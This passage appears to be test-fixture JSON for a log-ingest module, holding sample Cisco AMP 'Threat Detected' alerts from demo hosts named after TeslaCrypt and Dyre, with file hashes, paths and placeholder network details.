"e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 6617, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196250", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 318000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": 
"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 7942, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196249", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 303000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", 
+ "host.os.platform": "windows", + "input.type": "log", + "log.offset": 9267, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196248", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 287000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 10592, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + 
"209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196247", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 256000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 11917, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + 
"service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196246", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 225000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 13242, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + 
"cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196245", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 225000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 14567, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": 
"90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196244", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 209000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 15892, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196243", + 
"cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 178000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 17217, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196242", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], 
+ "cisco.amp.timestamp_nanoseconds": 147000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 18542, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196241", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 69000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 
6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 19867, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196240", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 69000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": 
"e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 21191, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:37.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176259080131182683", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 996000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176259080131183000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": 
"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 22515, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:37.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251507855228943", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 944000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251507855229000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 23834, + 
"related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:37.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.detection_id": "6159251503560261641", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 8000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251507855229000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 25159, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + 
"related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:36.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.detection_id": "6159251503560261640", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 821000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251503560262000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "t.exe", + "file.path": "\\\\?\\C:\\t.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 26489, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:36.000Z", + 
